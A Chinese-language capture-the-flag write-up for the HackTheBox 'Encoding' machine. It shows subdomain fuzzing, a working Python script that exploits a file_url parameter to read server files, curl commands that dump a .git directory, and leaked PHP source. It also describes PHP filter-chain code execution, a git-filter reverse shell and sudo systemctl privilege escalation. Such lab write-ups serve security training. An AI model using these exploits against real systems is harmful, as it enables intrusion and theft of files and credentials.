-
-
[原创]HTB Encoding (MEDIUM)
-
发表于: 2023-2-5 14:59
-
扫端口
扫目录,没有得到有意义的内容
扫域名
image没有权限访问
vim /etc/hosts将ip 域名写入
访问网址看下,有api手册
将file_url写成服务器本机上的路径,就能读文件
str2hex是转16进制,脚本里再转回来
扫目录有扫到index.php
再看utils.php,utils.php中使用到了git来管理网站版本
使用以下工具来下载.git
https://github.com/internetwache/GitTools/blob/master/Dumper/gitdumper.sh
更改gitdumper.sh中的命令
./git_dumper.sh http://image.haxtables.htb/.git/ image
action_handler.php中存在文件包含
通过 GET 参数指定要包含的文件。
再扫一下
缺少参数
去查看 handler文件查看 缺少哪些参数
尝试文件包含
无文件RCE
项目地址:
https://github.com/synacktiv/php_filter_chain_generator
详细讲解:
https://www.bilibili.com/video/BV1UY411X7hH/?vd_source=19cb7760ac0e62364afecb4c032b6119
测试一下
python3 php_filter_chain_generator.py --chain test
拿到www-data的shell
我们可以利用git-commit.sh
在/var/www/image中初始化一个新的存储库,为所有 .php 文件设置一个 indent过滤器,设置一个运行 bash 文件的命令来生成反向 shell,最后以 svc用户运行git-commit.sh文件。
运行pspy后发现
有一个concron定时任务会定时删除/var/www/image文件夹中的内容,并将root/scripts/image文件夹中的所有文件复制到/var/文件夹中
手速要快点
在/tmp下写个shell
https://www.revshells.com/
拿到user flag
(root) NOPASSWD: /usr/bin/systemctl restart *
构建一个服务提权,然后重启服务
参考链接:
https://medium.com/@Kushagra007/writeup-encoding-hackthebox-3d8548a86572
ffuf -H "Host:FUZZ.haxtables.htb" -w wordlist/SecLists-master/Discovery/DNS/subdomains-top1million-20000.txt -u http://haxtables.htb -fw 246
ffuf -H "Host:FUZZ.haxtables.htb" -w wordlist/SecLists-master/Discovery/DNS/subdomains-top1million-20000.txt -u http://haxtables.htb -fw 246
import requests
import json
def lfi(fil):
json_data = {
'action': 'str2hex',
'file_url' : f"file://{fil}"
}
print(f"[file] =>{fil}\n")
response = requests.post('http://api.haxtables.htb/v3/tools/string/index.php',json=json_data)
data = json.loads(response.text)
hex_string = data["data"]
bytes_object = bytes.fromhex(hex_string)
string = bytes_object.decode()
print(string)
#print("====="*20)
#print(response.text)
def main():
while True:
lf = input("[+]FILE >")
lfi(lf)
main()import requests
import json
def lfi(fil):
json_data = {
'action': 'str2hex',
'file_url' : f"file://{fil}"
}
print(f"[file] =>{fil}\n")
response = requests.post('http://api.haxtables.htb/v3/tools/string/index.php',json=json_data)
data = json.loads(response.text)
hex_string = data["data"]
bytes_object = bytes.fromhex(hex_string)
string = bytes_object.decode()
print(string)
#print("====="*20)
#print(response.text)
def main():
while True:
lf = input("[+]FILE >")
lfi(lf)
main()[file] =>/var/www/image/utils.php
<?php// Global functions
function jsonify($body, $code = null)
{ if ($code) {
http_response_code($code);
}
header('Content-Type: application/json; charset=utf-8');
echo json_encode($body);
exit;
}function get_url_content($url){ $domain = parse_url($url, PHP_URL_HOST);
if (gethostbyname($domain) === "127.0.0.1") {
echo jsonify(["message" => "Unacceptable URL"]);
}
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_PROTOCOLS, CURLPROTO_HTTP | CURLPROTO_HTTP);
curl_setopt($ch, CURLOPT_REDIR_PROTOCOLS, CURLPROTO_HTTPS);
curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,2);
curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
$url_content = curl_exec($ch);
curl_close($ch);
return $url_content;
}function git_status(){ $status = shell_exec('cd /var/www/image && /usr/bin/git status');
return $status;
}function git_log($file)
{ $log = shell_exec('cd /var/www/image && /ust/bin/git log --oneline "' . addslashes($file) . '"');
return $log;
}function git_commit(){ $commit = shell_exec('sudo -u svc /var/www/image/scripts/git-commit.sh');
return $commit;
}?>[+]FILE >/var/www/image/.git/HEAD
[file] =>/var/www/image/.git/HEAD
ref: refs/heads/master
[+]FILE >/var/www/image/.git/config
[file] =>/var/www/image/.git/config
[core] repositoryformatversion = 0 filemode = true
bare = false
logallrefupdates = true
[file] =>/var/www/image/utils.php
<?php// Global functions
function jsonify($body, $code = null)
{ if ($code) {
http_response_code($code);
}
header('Content-Type: application/json; charset=utf-8');
echo json_encode($body);
exit;
}function get_url_content($url){ $domain = parse_url($url, PHP_URL_HOST);
if (gethostbyname($domain) === "127.0.0.1") {
echo jsonify(["message" => "Unacceptable URL"]);
}
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_PROTOCOLS, CURLPROTO_HTTP | CURLPROTO_HTTP);
curl_setopt($ch, CURLOPT_REDIR_PROTOCOLS, CURLPROTO_HTTPS);
curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,2);
curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
$url_content = curl_exec($ch);
curl_close($ch);
return $url_content;
}function git_status(){ $status = shell_exec('cd /var/www/image && /usr/bin/git status');
return $status;
}function git_log($file)
{ $log = shell_exec('cd /var/www/image && /ust/bin/git log --oneline "' . addslashes($file) . '"');
return $log;
}function git_commit(){ $commit = shell_exec('sudo -u svc /var/www/image/scripts/git-commit.sh');
return $commit;
}?>[+]FILE >/var/www/image/.git/HEAD
[file] =>/var/www/image/.git/HEAD
ref: refs/heads/master
[+]FILE >/var/www/image/.git/config
[file] =>/var/www/image/.git/config
[core] repositoryformatversion = 0 filemode = true
bare = false
logallrefupdates = true
curl -X POST -H 'Content-Type: application/json' --data-binary "{\"action\": \"str2hex\", \"file_url\": \"file:///var/www/image/.git/$objname\"}" 'http://api.haxtables.htb/v3/tools/string/index.php' | jq .data | xxd -r -p > "$target"
curl -X POST -H 'Content-Type: application/json' --data-binary "{\"action\": \"str2hex\", \"file_url\": \"file:///var/www/image/.git/$objname\"}" 'http://api.haxtables.htb/v3/tools/string/index.php' | jq .data | xxd -r -p > "$target"
ffuf -w wordlist/SecLists-master/Discovery/Web-Content/raft-medium-directories.txt -u http://haxtables.htb/FUZZ.php
ffuf -w wordlist/SecLists-master/Discovery/Web-Content/raft-medium-directories.txt -u http://haxtables.htb/FUZZ.php
curl -s http://haxtables.htb/handler.php | jq
{ "message": "Insufficient parameters!"
}curl -s http://haxtables.htb/handler.php | jq
{ "message": "Insufficient parameters!"
}[file] =>/var/www/html/handler.php
<?phpinclude_once '../api/utils.php';
if (isset($_FILES['data_file'])) {
$is_file = true;
$action = $_POST['action'];
$uri_path = $_POST['uri_path'];
$data = $_FILES['data_file']['tmp_name'];
} else {
$is_file = false;
$jsondata = json_decode(file_get_contents('php://input'), true);
$action = $jsondata['action'];
$data = $jsondata['data'];
$uri_path = $jsondata['uri_path'];
if ( empty($jsondata) || !array_key_exists('action', $jsondata) || !array_key_exists('uri_path', $jsondata))
{
echo jsonify(['message' => 'Insufficient parameters!']);
// echo jsonify(['message' => file_get_contents('php://input')]);
}
}$response = make_api_call($action, $data, $uri_path, $is_file);
echo $response;?>[file] =>/var/www/html/handler.php
[培训]内核驱动高级班,冲击BAT一流互联网大厂工作,每周日13:00-18:00直播授课
|
|
|---|---|
